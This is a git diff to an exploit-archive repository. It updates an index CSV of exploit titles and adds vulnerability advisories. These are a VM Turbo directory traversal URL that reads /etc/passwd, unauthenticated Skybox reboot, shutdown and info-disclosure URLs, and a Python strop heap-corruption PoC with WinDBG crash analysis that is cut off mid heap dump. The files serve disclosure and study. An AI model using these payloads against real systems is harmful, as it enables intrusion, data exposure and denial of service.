diff --git a/files.csv b/files.csv index c7c304e48..e4ca6e916 100755 --- a/files.csv +++ b/files.csv @@ -8845,7 +8845,7 @@ id,file,description,date,author,platform,type,port 9371,platforms/php/webapps/9371.txt,"opennews 1.0 (sqli/rce) Multiple Vulnerabilities",2009-08-05,SirGod,php,webapps,0 9372,platforms/php/webapps/9372.txt,"Portel 2008 - (decide.php patron) Blind SQL Injection Vulnerability",2009-08-05,"Chip d3 bi0s",php,webapps,0 9373,platforms/freebsd/dos/9373.c,"FreeBSD 7.2-RELEASE SCTP Local Kernel Denial of Service Exploit",2009-08-06,"Shaun Colley",freebsd,dos,0 -9375,platforms/windows/local/9375.py,"JetAudio 7.1.9.4030 Universal Stack Overflow Exploit (SEH)",2009-08-06,Dr_IDE,windows,local,0 +9375,platforms/windows/local/9375.py,"JetAudio 7.1.9.4030 (.m3u) - Universal Stack Overflow Exploit (SEH)",2009-08-06,Dr_IDE,windows,local,0 9376,platforms/windows/dos/9376.py,"jetAudio <= 7.5.5 plus vx (M3U/ASX/WAX/WVX) Local Crash PoC",2009-09-10,Dr_IDE,windows,dos,0 9377,platforms/windows/local/9377.pl,"A2 Media Player Pro 2.51 (.m3u /m3l) Universal Local BOF Exploit (SEH)",2009-08-06,hack4love,windows,local,0 9378,platforms/php/webapps/9378.txt,"PHP Script Forum Hoster (Topic Delete/XSS) Multiple Vulnerabilities",2009-08-06,int_main();,php,webapps,0 @@ -9873,7 +9873,7 @@ id,file,description,date,author,platform,type,port 10647,platforms/php/webapps/10647.txt,"VideoIsland Remote shell upload Vulnerability",2009-12-24,RENO,php,webapps,0 10648,platforms/php/webapps/10648.txt,"cms -db <= 0.7.13 - Multiple Vulnerabilities",2009-12-25,"cp77fk4r ",php,webapps,0 10649,platforms/windows/webapps/10649.html,"SoftCab Sound Converter ActiveX Insecure Method Exploit (sndConverter.ocx)",2009-12-25,"ThE g0bL!N",windows,webapps,0 -10650,platforms/windows/dos/10650.pl,"jetAudio 8.0.0.0 - Basic Local Crash PoC",2009-12-25,"D3V!L FUCKER",windows,dos,0 +10650,platforms/windows/dos/10650.pl,"jetAudio 8.0.0.0 (.asx) - Basic Local Crash PoC",2009-12-25,"D3V!L FUCKER",windows,dos,0 10651,platforms/windows/dos/10651.pl,"JetAudio Basic 7.5.5.25 .asx Buffer Overflow PoC",2009-12-25,"D3V!L FUCKER",windows,dos,0 10652,platforms/php/webapps/10652.txt,"asaher pro 1.0 RFI Vulnerability",2009-12-25,indoushka,php,webapps,0 10653,platforms/php/webapps/10653.txt,"Winn Guestbook 2.4, Winn.ws - Cross Site Scripting Vulnerability",2009-12-25,indoushka,php,webapps,0 @@ -10278,7 +10278,7 @@ id,file,description,date,author,platform,type,port 11204,platforms/windows/remote/11204.html,"AOL 9.5 ActiveX 0day Exploit (heap spray)",2010-01-20,Dz_attacker,windows,remote,0 11205,platforms/windows/local/11205.pl,"MP3 Studio 1.x - (.m3u File) Local Stack Overflow (Universal)",2010-01-20,"D3V!L FUCKER",windows,local,0 11208,platforms/windows/local/11208.pl,"jetAudio 8.0.0.2 Basic (m3u) Stack Overflow Exploit",2010-01-21,"cr4wl3r ",windows,local,0 -11209,platforms/windows/dos/11209.pl,"jetAudio 8.0.0.2 Basic Local Crash Exploit",2010-01-21,"cr4wl3r ",windows,dos,0 +11209,platforms/windows/dos/11209.pl,"jetAudio 8.0.0.2 Basic (.asx) - Local Crash Exploit",2010-01-21,"cr4wl3r ",windows,dos,0 11210,platforms/windows/remote/11210.rb,"EFS Easy Chat server Universal BOF-SEH (Meta)",2010-01-21,fb1h2s,windows,remote,0 11211,platforms/multiple/webapps/11211.txt,"cPanel HTTP Response Splitting Vulnerability",2010-01-21,Trancer,multiple,webapps,0 11212,platforms/asp/webapps/11212.txt,"eWebeditor Directory Traversal",2010-01-21,N/A,asp,webapps,0 @@ -29250,7 +29250,7 @@ id,file,description,date,author,platform,type,port 32479,platforms/php/webapps/32479.txt,"BigDump 0.35b - Arbitrary Upload",2014-03-24,"felipe andrian",php,webapps,0 32481,platforms/windows/dos/32481.txt,"Light Audio Player 1.0.14 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0 32482,platforms/windows/dos/32482.py,"GOM Media Player (GOMMP) 2.2.56.5183 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0 -32483,platforms/windows/dos/32483.py,"GOM Video Converter 1.1.0.60 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0 +32483,platforms/windows/dos/32483.py,"GOM Video Converter 1.1.0.60 (.wav) - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0 32485,platforms/asp/webapps/32485.txt,"ASP Indir Iltaweb Alisveris Sistemi 'xurunler.asp' SQL Injection Vulnerability",2008-10-13,tRoot,asp,webapps,0 32486,platforms/php/webapps/32486.txt,"Webscene eCommerce 'productlist.php' SQL Injection Vulnerability",2008-10-14,"Angela Chang",php,webapps,0 32487,platforms/php/webapps/32487.txt,"Elxis CMS 2008.1 modules/mod_language.php Multiple Parameter XSS",2008-10-14,faithlove,php,webapps,0 @@ -29976,6 +29976,8 @@ id,file,description,date,author,platform,type,port 33247,platforms/hardware/webapps/33247.txt,"OpenFiler 2.99.1 - Arbitrary Code Execution",2014-05-08,"Dolev Farhi",hardware,webapps,0 33248,platforms/hardware/webapps/33248.txt,"OpenFiler 2.99.1 - Multiple persistent XSS Vulnerabilities",2014-05-08,"Dolev Farhi",hardware,webapps,0 33249,platforms/php/webapps/33249.txt,"Collabtive 1.2 - SQL Injection",2014-05-08,"Deepak Rathore",php,webapps,0 +33250,platforms/php/webapps/33250.txt,"Collabtive 1.2 - Stored XSS",2014-05-08,"Deepak Rathore",php,webapps,0 +33251,platforms/multiple/local/33251.txt,"Python - Interpreter Heap Memory Corruption (PoC)",2014-05-08,"Debasish Mandal",multiple,local,0 33252,platforms/php/webapps/33252.txt,"Cobbler 2.4.x - 2.6.x - LFI Vulnerability",2014-05-08,"Dolev Farhi",php,webapps,0 33254,platforms/java/webapps/33254.txt,"IBM Lotus Connections 2.0.1 'simpleSearch.do' Cross Site Scripting Vulnerability",2009-09-23,IBM,java,webapps,0 33255,platforms/linux/local/33255.txt,"Xen 3.x pygrub Local Authentication Bypass Vulnerability",2009-09-25,"Jan Lieskovsky",linux,local,0 @@ -30038,3 +30040,12 @@ id,file,description,date,author,platform,type,port 33320,platforms/php/webapps/33320.txt,"TFTgallery 0.13 'sample' Parameter Cross Site Scripting Vulnerability",2009-11-02,blake,php,webapps,0 33321,platforms/linux/local/33321.c,"Linux Kernel 2.6.x 'pipe.c' Local Privilege Escalation Vulnerability (1)",2009-11-03,"teach & xipe",linux,local,0 33322,platforms/linux/local/33322.c,"Linux Kernel 2.6.x pipe.c Local Privilege Escalation Vulnerability (2)",2009-11-03,"teach & xipe",linux,local,0 +33326,platforms/windows/remote/33326.py,"Easy Chat Server 3.1 - Stack Buffer Overflow",2014-05-12,superkojiman,windows,remote,0 +33327,platforms/hardware/webapps/33327.txt,"Skybox Security 6.3.x - 6.4.x - Multiple Information Disclosure",2014-05-12,"Luigi Vezzoso",hardware,webapps,0 +33328,platforms/hardware/dos/33328.txt,"Skybox Security 6.3.x - 6.4.x - Multiple Denial Of Service Issue",2014-05-12,"Luigi Vezzoso",hardware,dos,0 +33330,platforms/windows/webapps/33330.txt,"SpiceWorks 7.2.00174 - Persistent XSS Vulnerabilities",2014-05-12,"Dolev Farhi",windows,webapps,80 +33331,platforms/windows/remote/33331.rb,"Yokogawa CS3000 BKESimmgr.exe Buffer Overflow",2014-05-12,metasploit,windows,remote,34205 +33332,platforms/windows/dos/33332.py,"JetAudio 8.1.1 (.ogg) - Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0 +33333,platforms/windows/remote/33333.rb,"Adobe Flash Player Shader Buffer Overflow",2014-05-12,metasploit,windows,remote,0 +33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80 +33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 (.ogg) - Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0 diff --git a/platforms/cgi/webapps/33334.txt b/platforms/cgi/webapps/33334.txt new file mode 100755 index 000000000..af9e1d977 --- /dev/null +++ b/platforms/cgi/webapps/33334.txt @@ -0,0 +1,33 @@ +Product: VM Turbo Operations Manager +Vendor: VM Turbo +Vulnerable Version(s): 4.5.x earlier +Tested Version: 4.0 +Advisory Publication: April 11, 2014 +Vendor Notification: April 11, 2014 +Public Disclosure: May 8, 2014 +Vulnerability Type: Directory Traversal + +Discovered and Provided: (Jamal Pecou) Security Focus ( https://www.securityfocus.com/ ) + +------------------------------------------------------------------------ +----------------------- + +Advisory Details: + +A vulnerability affecting “/cgi-bin/help/doIt.cgi" in VM Turbo Operations Manager allows directory traversal when the URL encoded POST input “xml_path” was set to “../../../../../../../../../../etc/passwd” we could see the contents of this file. + + +The following exploitation example displays the contents of /etc/passwd + +http://[host]/cgi-bin/help/doIt.cgi?FUNC=load_xml_file&xml_path=../../../../../../../../../../etc/passwd + +------------------------------------------------------------------------ +----------------------- + +Solution: + + The vendor has released a fix for this vulnerability in version 4.6. + +References: + +[1] https://support.vmturbo.com/hc/en-us/articles/203170127-VMTurbo-Operations-Manager-v4-6-Announcement \ No newline at end of file diff --git a/platforms/hardware/dos/33328.txt b/platforms/hardware/dos/33328.txt new file mode 100755 index 000000000..9f11db8c1 --- /dev/null +++ b/platforms/hardware/dos/33328.txt @@ -0,0 +1,42 @@ +# Exploit Title: [SKYBOX Security - DDOS] + +# Date: [22-Jan-2014] +# Exploit Author: [Luigi Vezzoso] +# Vendor Homepage: [http://www.skyboxsecurity.com] +# Version: [Skybox View Appliances with ISO versions: 6.3.33-2.14, +6.3.31-2.14, 6.4.42-2.54, 6.4.45-2.56, 6.4.46-2.57] +# Tested on: [Centos 6.4 kernel 2.6.32] +# CVE : [CVE-2014-2085] + +#OVERVIEW +A vulnerability has been found in some Skybox View Appliances’ Admin +interfaces which would allow a potential malicious party to bypass +the authentication mechanism and execute reboot and/or shutdown of +appliance self + +#INTRODUCTION +Skybox Security has a complete portfolio of security management +tools that deliver the security intelligence needed to act fast to +minimize risks and eliminate attack vectors. Based on a powerful +risk analytics platform that links data from vulnerability scanners, +threat intelligence feeds, firewalls and other network infrastructure +devices – Skybox gives you context to prioritize risks accurately and +automatically, in minutes. + +#VULNERABILITY DESCRIPTION +It's possible to open and execute the reboot and shutdown script +without autentication at the following links: +https://1.1.1.1:444/scripts/commands/reboot?_=1111111111 +https://1.1.1.1:444/scripts/commands/shutdown?_=1111111111 +#VERSIONS AFFECTED +Skybox View Appliances with ISO versions: 6.3.33-2.14, 6.3.31-2.14, +6.4.42-2.54, 6.4.45-2.56, 6.4.46-2.57 + +#SOLUTION +Please refer to the vendor security advisor: Security Advisory 2014- +3-25-1 + +#CREDITS +Luigi Vezzoso +email: luigivezzoso@gmail.com +skype: luigivezzoso \ No newline at end of file diff --git a/platforms/hardware/webapps/33327.txt b/platforms/hardware/webapps/33327.txt new file mode 100755 index 000000000..3207b04d0 --- /dev/null +++ b/platforms/hardware/webapps/33327.txt @@ -0,0 +1,48 @@ +# Exploit Title: [SKYBOX Security – Multiple +Information Disclosure] + +# Date: [22-Jan-2014] +# Exploit Author: [Luigi Vezzoso] +# Vendor Homepage: [http://www.skyboxsecurity.com] +# Version: [Skybox View Appliances with ISO versions: 6.3.33-2.14, +6.3.31-2.14, 6.4.42-2.54, 6.4.45-2.56, 6.4.46-2.57] +# Tested on: [Centos 6.4 kernel 2.6.32] +# CVE : [CVE-2014-2084] + +#OVERVIEW +A vulnerability has been found in some Skybox View Appliances’ Admin +interfaces which would allow a potential malicious party to bypass +the authentication mechanism and obtain read-only access to the +appliance’s administrative menus. This would allow the malicious +party to read system-related information such as interface names, IP +addresses and the appliance status. + +#INTRODUCTION +Skybox Security has a complete portfolio of security management +tools that deliver the security intelligence needed to act fast to +minimize risks and eliminate attack vectors. Based on a powerful +risk analytics platform that links data from vulnerability scanners, +threat intelligence feeds, firewalls and other network infrastructure +devices – Skybox gives you context to prioritize risks accurately and +automatically, in minutes. + +#VULNERABILITY DESCRIPTION +It's possible to obtain useful information about the version and +network configuration of skybox appliances bypassing the webui +interface. +For the appliance system info open with a browser: +https://1.1.1.1:444/scripts/commands/getSystemInformation?_=111111111 +For the appliance network info open with a browser: +https://1.1.1.1:444/scripts/commands/getNetworkConfigurationInfo +#VERSIONS AFFECTED +Skybox View Appliances with ISO versions: 6.3.33-2.14, 6.3.31-2.14, +6.4.42-2.54, 6.4.45-2.56, 6.4.46-2.57 + +#SOLUTION +Please refer to the vendor security advisor: Security Advisory 2014- +3-25-1 + +#CREDITS +Luigi Vezzoso +email: luigivezzoso@gmail.com +skype: luigivezzoso \ No newline at end of file diff --git a/platforms/multiple/local/33251.txt b/platforms/multiple/local/33251.txt new file mode 100755 index 000000000..c8ba04c1f --- /dev/null +++ b/platforms/multiple/local/33251.txt @@ -0,0 +1,1202 @@ +# Title: Python Interpreter Heap Memory Corruption +# Date: Sun, 30 Mar 2014 20:09:44 -0400 +# Vulnerability Discovered By : Unknown +# Proof of Concept : Debasish Mandal (https://twitter.com/debasishm89) +# Software Link: https://www.python.org/ +# Version: All , Fix released (http://hg.python.org/cpython/rev/5dabc2d2f776) +# Tested on: Microsoft Windows XP Professional SP2 EN (32bit) + +Recentl a new fix has been pushed to official python source code repository which fixes (http://hg.python.org/cpython/rev/5dabc2d2f776 +) a memory corruption vulnerability in python interpreter's strop module. The vulnerability lies in expandtabs() functions. +This is due to a missing check in line 626,627 of /Modules/stropmodule.c. + +Vulnerable Code: + +https://github.com/pgbovine/Py2crazy/blob/master/Python-2.7.5/Modules/stropmodule.c#L627 + +------------------------------------------------------------------------------------------------------------ + for (p = string; p < e; p++) { + if (*p == '\t') { + j += tabsize - (j%tabsize); + if (old_j > j) { + PyErr_SetString(PyExc_OverflowError, + "new string is too long"); + return NULL; + } + old_j = j; + } else { + j++; + if (*p == '\n') { + // Missing check + i += j; + j = 0; + } + } + } +------------------------------------------------------------------------------------------------------------ + +Patch Diff: +http://hg.python.org/cpython/diff/5dabc2d2f776/Modules/stropmodule.c + + +================= +Proof of Concept: +================= + +Running below code will crash the vulnerable python.exe process. + +import strop +raw_input('Press Enter to BOOM!') +a = '\t\n' * 65536 +strop.expandtabs(a, 65536) + +============================ +Crash Analysis using WinDBG: +============================ + +Microsoft (R) Windows Debugger Version 6.12.0002.633 X86 +Copyright (c) Microsoft Corporation. All rights reserved. + +*** wait with pending attach +Symbol search path is: SRV*E:\symbol*http://msdl.microsoft.com/download/symbols +Executable search path is: +ModLoad: 1d000000 1d00a000 C:\Python27\python.exe +ModLoad: 7c900000 7c9b0000 C:\WINDOWS\system32\ntdll.dll +ModLoad: 7c800000 7c8f4000 C:\WINDOWS\system32\kernel32.dll +ModLoad: 1e000000 1e227000 C:\WINDOWS\system32\python27.dll +ModLoad: 77d40000 77dd0000 C:\WINDOWS\system32\USER32.dll +ModLoad: 77f10000 77f56000 C:\WINDOWS\system32\GDI32.dll +ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll +ModLoad: 77e70000 77f01000 C:\WINDOWS\system32\RPCRT4.dll +ModLoad: 7c9c0000 7d1d4000 C:\WINDOWS\system32\SHELL32.dll +ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll +ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll +ModLoad: 78520000 785c3000 C:\WINDOWS\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\MSVCR90.dll +ModLoad: 773d0000 774d2000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9\comctl32.dll +ModLoad: 5d090000 5d127000 C:\WINDOWS\system32\comctl32.dll +(f0.320): Break instruction exception - code 80000003 (first chance) +eax=7ffd6000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005 +eip=7c901230 esp=023dffcc ebp=023dfff4 iopl=0 nv up ei pl zr na pe nc +cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 +ntdll!DbgBreakPoint: +7c901230 cc int 3 +0:001> g +(f0.1f4): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=20202020 ebx=0263bffe ecx=00003fff edx=00000001 esi=00010000 edi=025cf000 +eip=7855b37f esp=0021fce4 ebp=0021fd1c iopl=0 nv up ei pl nz na pe nc +cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206 +MSVCR90!memset+0x5f: +7855b37f f3ab rep stos dword ptr es:[edi] + +We can see we have a write access violation at MSVCR90!memset+0x5f: + +Crash stack trace: + +0:000> kb +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\python27.dll - +ChildEBP RetAddr Args to Child +0021fce4 1e0483e2 025ceffd 00000020 00010000 MSVCR90!memset+0x5f +WARNING: Stack unwind information not available. Following frames may be wrong. +0021fd1c 1e08883b 00000000 022e7cd8 022eb5a8 python27!PyOS_AfterFork+0xc9f +0021fd38 1e0bf781 022eb5a8 022e7cd8 00000000 python27!PyCFunction_Call+0x138 +0021fd60 1e0bcb94 1e0bd826 0021fdc4 01e280f8 python27!PyEval_GetFuncDesc+0x341 +0021fd64 1e0bd826 0021fdc4 01e280f8 02663ff0 python27!PyEval_EvalFrameEx+0x18e4 +0021fdd8 1e0be200 0021fe20 1e0be82e 02663eb8 python27!PyEval_EvalFrameEx+0x2576 +0021fde0 1e0be82e 02663eb8 00000000 0261e2c0 python27!PyEval_EvalCodeEx+0x50 +0021fe20 1e0bb295 01e280f8 01e1e6f0 01e1e6f0 python27!PyEval_EvalCodeEx+0x67e +0021fe54 1e0e0d68 01e280f8 01e1e6f0 01e1e6f0 python27!PyEval_EvalCode+0x25 +0021fe70 1e0e0d36 0261e2c0 01de2ff3 01e1e6f0 python27!PyRun_FileExFlags+0x97 +0021fe9c 1e0e0329 785b7408 01de2ff3 00000101 python27!PyRun_FileExFlags+0x65 +0021fed8 1e0dff3e 785b7408 01de2ff3 00000001 python27!PyRun_SimpleFileExFlags+0x133 +0021fef8 1e02f5df 785b7408 01de2ff3 00000001 python27!PyRun_AnyFileExFlags+0x4c +*** ERROR: Module load completed but symbols could not be loaded for C:\Python27\python.exe +0021ff7c 1d001160 00000002 01de2fd0 01d9ef80 python27!Py_Main+0x805 +0021ffc0 7c816d4f 00090000 01fa0cda 7ffd6000 python+0x1160 +0021fff0 00000000 1d0012a8 00000000 78746341 kernel32!BaseProcessStart+0x23 + +We crashed inside MSVCR90!memset + +After that we restart the app and set a break point at memset. + +0:001> bp MSVCR90!memset +0:001> g +Breakpoint 0 hit +eax=00aada58 ebx=00000014 ecx=00000014 edx=00000a98 esi=1e1e0658 edi=00aada58 +eip=7855b320 esp=0021fbe8 ebp=0021fc30 iopl=0 nv up ei pl nz na po nc +cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000202 +MSVCR90!memset: +7855b320 8b54240c mov edx,dword ptr [esp+0Ch] ss:0023:0021fbf4=00000014 + +Partial Dis assembly of memset caller: + +.text:1E0483D0 sub esi, edx +.text:1E0483D2 add [ebp+var_4], esi +.text:1E0483D5 test esi, esi +.text:1E0483D7 jle short loc_1E0483F8 +.text:1E0483D9 push esi ; Size +.text:1E0483DA push 20h ; Val +.text:1E0483DC push edi ; Dst +.text:1E0483DD call memset +.text:1E0483E2 add esp, 0Ch +.text:1E0483E5 add edi, esi +.text:1E0483E7 jmp short loc_1E0483F8 +.tex + +edi=00aada58 is pointing to destination where final string is getting copied. + +0:000> dd esp +0021fbe8 1e0978ad 00aada58 00000000 00000014 +0021fbf8 00a81310 1e0977a2 1e1e0658 1e075222 +0021fc08 1e1e0658 00000000 1e0977a2 1e0977dc +0021fc18 1e1e0658 00a81310 00000000 1e1e0658 +0021fc28 1e0977a2 00aa8e40 0021fc9c 1e0650fe +0021fc38 1e1e0658 00a81310 00000000 009aabf0 +0021fc48 00a81310 1e06518c 1e1e0658 00a81310 +0021fc58 00000000 009aabf0 00000000 1e0651d9 + + +0:000> !address 00aada58 + 00a80000 : 00a80000 - 0004b000 + Type 00020000 MEM_PRIVATE + Protect 00000004 PAGE_READWRITE + State 00001000 MEM_COMMIT + Usage RegionUsageHeap + Handle 00970000 + + +It's confirmed that the memset() is actually trying write to heap. After few calls to memset the python.exe process will crash. + +0:000> g +(7d8.44c): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=20202020 ebx=00adbf66 ecx=000037e1 edx=00000001 esi=00010000 edi=00b0e000 +eip=7855b37f esp=0021fce4 ebp=0021fd1c iopl=0 nv up ei pl nz na pe nc +cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206 +MSVCR90!memset+0x5f: +7855b37f f3ab rep stos dword ptr es:[edi] + +========================================= +Verify memory corruption using bang heap: +========================================= + +0:000> !heap -s + Heap Flags Reserv Commit Virt Free List UCR Virt Lock Fast + (k) (k) (k) (k) length blocks cont. heap +----------------------------------------------------------------------------- +00240000 00000002 1024 32 32 8 1 1 0 0 L +00340000 00001002 64 24 24 13 1 1 0 0 L +00350000 00008000 64 12 12 10 1 1 0 0 +00930000 00001002 64 16 16 2 1 1 0 0 L +00950000 00001002 64 16 16 2 2 1 0 0 L +00970000 00001002 3136 1644 1656 33 3 2 0 0 L +----------------------------------------------------------------------------- + +0x00240000 is Default Process Heap. From the size of commited bytes we can say 0x00970000 handling a large number of data. + +0:000> !heap -a 00970000 +Index Address Name Debugging options enabled + 6: 00970000 + Segment at 00970000 to 00980000 (00010000 bytes committed) + Segment at 00980000 to 00a80000 (00100000 bytes committed) + Segment at 00a80000 to 00c80000 (0008b000 bytes committed) + Flags: 00001002 + ForceFlags: 00000000 + Granularity: 8 bytes + Segment Reserve: 00400000 + Segment Commit: 00002000 + DeCommit Block Thres: 00000200 + DeCommit Total Thres: 00002000 + Total Free Size: 000010df + Max. Allocation Size: 7ffdefff + Lock Variable at: 00970608 + Next TagIndex: 0000 + Maximum TagIndex: 0000 + Tag Entries: 00000000 + PsuedoTag Entries: 00000000 + Virtual Alloc List: 00970050 + UCR FreeList: 00970598 + FreeList Usage: 84091158 00001001 00000000 80000000 + FreeList[ 00 ] at 00970178: 00ac5eb8 . 00a6f8d8 + 00a6f8d0: 01008 . 00ad8 [00] - free + 00b0bf88: 10100 . 10100 [20] - free + Unable to read nt!_HEAP_FREE_ENTRY structure at 20202018 + FreeList[ 03 ] at 00970190: 00a38ff0 . 00a57fe0 + 00a57fd8: 00048 . 00018 [00] - free + 00a38fe8: 00048 . 00018 [00] - free + FreeList[ 04 ] at 00970198: 009c1fe8 . 009c1fe8 + 009c1fe0: 00188 . 00020 [00] - free + FreeList[ 06 ] at 009701a8: 00acf128 . 00acf128 + 00acf120: 00130 . 00030 [00] - free + FreeList[ 08 ] at 009701b8: 00a58fb8 . 00a58fb8 + 00a58fb0: 00010 . 00040 [00] - free + FreeList[ 0c ] at 009701d8: 009cb980 . 009cb980 + 009cb978: 00010 . 00060 [00] - free + FreeList[ 10 ] at 009701f8: 009c7588 . 009c7588 + 009c7580: 00178 . 00080 [00] - free + FreeList[ 13 ] at 00970210: 00a2af50 . 00a2af50 + 00a2af48: 000c8 . 00098 [00] - free + FreeList[ 1a ] at 00970248: 00ac5a68 . 00ac5a68 + 00ac5a60: 00170 . 000d0 [00] - free + FreeList[ 1f ] at 00970270: 00a71990 . 00a71990 + 00a71988: 00188 . 000f8 [00] - free + FreeList[ 20 ] at 00970278: 00a78c78 . 00a78c78 + 00a78c70: 00188 . 00100 [00] - free + FreeList[ 2c ] at 009702d8: 009d8788 . 009d8788 + 009d8780: 001d0 . 00160 [00] - free + FreeList[ 7f ] at 00970570: 00a7a3c0 . 00a7a3c0 + 00a7a3b8: 00220 . 003f8 [00] - free + Segment00 at 00970640: + Flags: 00000000 + Base: 00970000 + First Entry: 00970680 + Last Entry: 00980000 + Total Pages: 00000010 + Total UnCommit: 00000000 + Largest UnCommit:00000000 + UnCommitted Ranges: (0) + + Heap entries for Segment00 in Heap 00970000 + 00970000: 00000 . 00640 [01] - busy (640) + 00970640: 00640 . 00040 [01] - busy (40) + 00970680: 00040 . 01808 [01] - busy (1800) + 00971e88: 01808 . 00220 [01] - busy (214) + 009720a8: 00220 . 00808 [01] - busy (800) + 009728b0: 00808 . 001c8 [01] - busy (1c0) + 00972a78: 001c8 . 00188 [01] - busy (180) + 00972c00: 00188 . 00010 [01] - busy (4) + 00972c10: 00010 . 00010 [01] - busy (4) + 00972c20: 00010 . 00010 [01] - busy (4) + 00972c30: 00010 . 00018 [01] - busy (10) + 00972c48: 00018 . 00020 [01] - busy (18) + 00972c68: 00020 . 00018 [01] - busy (10) + 00972c80: 00018 . 00018 [01] - busy (10) + 00972c98: 00018 . 00028 [01] - busy (20) + 00972cc0: 00028 . 00018 [01] - busy (c) + 00972cd8: 00018 . 00010 [01] - busy (8) + 00972ce8: 00010 . 00228 [01] - busy (220) + 00972f10: 00228 . 00088 [01] - busy (7c) + 00972f98: 00088 . 00040 [01] - busy (34) + 00972fd8: 00040 . 00050 [01] - busy (43) + 00973028: 00050 . 00020 [01] - busy (13) + 00973048: 00020 . 00040 [01] - busy (31) + 00973088: 00040 . 00028 [01] - busy (1d) + 009730b0: 00028 . 00030 [01] - busy (24) + 009730e0: 00030 . 00020 [01] - busy (14) + 00973100: 00020 . 00020 [01] - busy (12) + 00973120: 00020 . 00018 [01] - busy (d) + 00973138: 00018 . 00040 [01] - busy (31) + 00973178: 00040 . 00028 [01] - busy (1e) + 009731a0: 00028 . 00020 [01] - busy (17) + 009731c0: 00020 . 00018 [01] - busy (e) + 009731d8: 00018 . 00098 [01] - busy (8a) + 00973270: 00098 . 00048 [01] - busy (39) + 009732b8: 00048 . 00028 [01] - busy (1b) + 009732e0: 00028 . 00050 [01] - busy (45) + 00973330: 00050 . 00020 [01] - busy (12) + 00973350: 00020 . 00020 [01] - busy (18) + 00973370: 00020 . 00028 [01] - busy (1e) + 00973398: 00028 . 00020 [01] - busy (13) + 009733b8: 00020 . 00020 [01] - busy (14) + 009733d8: 00020 . 00018 [01] - busy (f) + 009733f0: 00018 . 00020 [01] - busy (16) + 00973410: 00020 . 00030 [01] - busy (28) + 00973440: 00030 . 00030 [01] - busy (27) + 00973470: 00030 . 00028 [01] - busy (1b) + 00973498: 00028 . 00028 [01] - busy (19) + 009734c0: 00028 . 00040 [01] - busy (36) + 00973500: 00040 . 00020 [01] - busy (12) + 00973520: 00020 . 00808 [01] - busy (800) + 00973d28: 00808 . 00088 [01] - busy (80) + 00973db0: 00088 . 00088 [01] - busy (80) + 00973e38: 00088 . 00038 [01] - busy (30) + 00973e70: 00038 . 00030 [01] - busy (24) + 00973ea0: 00030 . 00018 [01] - busy (c) + 00973eb8: 00018 . 00060 [01] - busy (54) + 00973f18: 00060 . 00188 [01] - busy (180) + 009740a0: 00188 . 00608 [01] - busy (600) + 009746a8: 00608 . 00608 [01] - busy (600) + 00974cb0: 00608 . 00608 [01] - busy (600) + 009752b8: 00608 . 00208 [01] - busy (1fd) + 009754c0: 00208 . 00188 [01] - busy (180) + 00975648: 00188 . 00608 [01] - busy (600) + 00975c50: 00608 . 00608 [01] - busy (600) + 00976258: 00608 . 00228 [01] - busy (219) + 00976480: 00228 . 00608 [01] - busy (600) + 00976a88: 00608 . 00048 [01] - busy (3c) + 00976ad0: 00048 . 00150 [01] - busy (145) + 00976c20: 00150 . 00188 [01] - busy (180) + 00976da8: 00188 . 00110 [01] - busy (107) + 00976eb8: 00110 . 00188 [01] - busy (180) + 00977040: 00188 . 00608 [01] - busy (600) + 00977648: 00608 . 00190 [01] - busy (187) + 009777d8: 00190 . 00608 [01] - busy (600) + 00977de0: 00608 . 00608 [01] - busy (600) + 009783e8: 00608 . 00110 [01] - busy (103) + 009784f8: 00110 . 00220 [01] - busy (216) + 00978718: 00220 . 00188 [01] - busy (180) + 009788a0: 00188 . 00070 [01] - busy (64) + 00978910: 00070 . 00188 [01] - busy (180) + 00978a98: 00188 . 00608 [01] - busy (600) + 009790a0: 00608 . 00608 [01] - busy (600) + 009796a8: 00608 . 00148 [01] - busy (13b) + 009797f0: 00148 . 00188 [01] - busy (180) + 00979978: 00188 . 00608 [01] - busy (600) + 00979f80: 00608 . 00170 [01] - busy (162) + 0097a0f0: 00170 . 00608 [01] - busy (600) + 0097a6f8: 00608 . 00188 [01] - busy (180) + 0097a880: 00188 . 00608 [01] - busy (600) + 0097ae88: 00608 . 00608 [01] - busy (600) + 0097b490: 00608 . 001a8 [01] - busy (19c) + 0097b638: 001a8 . 00098 [01] - busy (8c) + 0097b6d0: 00098 . 00188 [01] - busy (180) + 0097b858: 00188 . 00608 [01] - busy (600) + 0097be60: 00608 . 00188 [01] - busy (180) + 0097bfe8: 00188 . 00188 [01] - busy (180) + 0097c170: 00188 . 00188 [01] - busy (180) + 0097c2f8: 00188 . 00608 [01] - busy (600) + 0097c900: 00608 . 00188 [01] - busy (180) + 0097ca88: 00188 . 00608 [01] - busy (600) + 0097d090: 00608 . 00188 [01] - busy (180) + 0097d218: 00188 . 000c0 [01] - busy (b8) + 0097d2d8: 000c0 . 00188 [01] - busy (180) + 0097d460: 00188 . 00188 [01] - busy (180) + 0097d5e8: 00188 . 00608 